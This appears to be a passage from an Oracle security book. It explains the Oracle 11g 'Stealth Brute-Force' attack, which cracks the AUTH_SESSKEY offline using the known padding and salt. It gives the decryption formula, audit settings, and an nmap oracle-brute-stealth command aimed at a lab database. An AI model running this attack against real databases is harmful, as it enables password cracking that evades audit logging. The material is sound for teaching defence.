Database Reference
In-Depth Information
1.
Client sends just username to the server.
Server sends session key (
AUTH_SESSKEY
) with a
known fixed string
as padding, which has
been encrypted by the server using the user's password hash and the salt, which is also
sent (
AUTH_VFR_DATA
). This is a lot of information to send considering the client has sent
only a username.
2.
3.
Attacking client can STOP the negotiation at this point before a Failed Logon is recorded in
audit trail. Hence the name for the attack—“Stealth Brute-Force”.
Attacker brute forces
AUTH_SESSKEY
using prepared password-hash guesses and the
supplied salt until the decryption results in the known fixed-string padding, thus
indicating the correct guess has been made.
4.
Algorithmically, the calculation to decrypt the session key can be described as follows:
CLEARTEXT_AUTH_SESSKEY_WITH_PADDING = AES192_DECRYPT_CBC
(AUTH_SESSKEY, Using KEY = SHA1({pass}+SALT) || 0x00*4)
Only
{pass}
is not known, so it can be guessed automatically by replacing with a variable until the known
padding is revealed, thus indicating that the password guess was correct. Next is a practical demonstration of the
attack process. The first step is to use the nmap network scanner to capture an encrypted session key:
Following are the database settings showing that auditing is turned on:
SQL> sho parameter audit;
NAME TYPE VALUE
------------------------------------ ----------- ------------------------------
audit_file_dest string /u01/app/oracle/admin/orcl/adump
audit_sys_operations boolean TRUE
audit_syslog_level string LOCAL6.INFO
audit_trail string DB_EXTENDED
SQL> alter user sys identified by
MYpassword_12
;
User altered.
root@linuxbox $ tail -f /var/log/oracle.log
May 24 00:43:47 linuxbox Oracle Audit[19255]: LENGTH : '183' ACTION :[30] '
alter user sys identified
by *
' DATABASE USER:[1] '/' PRIVILEGE :[6] 'SYSDBA' CLIENT USER:[6] 'oracle' CLIENT TERMINAL:[5]
'pts/4' STATUS:[1] '0' DBID:[10] '1230122245'
root@orlin $ cat /home/oracle/john/pcap/userdb
SYS
Then use nmap to capture the key:
root@orlin $ /usr/bin/nmap --script oracle-brute-stealth -p 1521 --script-args oracle-brute-stealth.
sid=DB11g,userdb=/home/oracle/john/pcap/userdb,passdb=/home/oracle/john/pcap/passdb 192.168.0.33
--datadir.
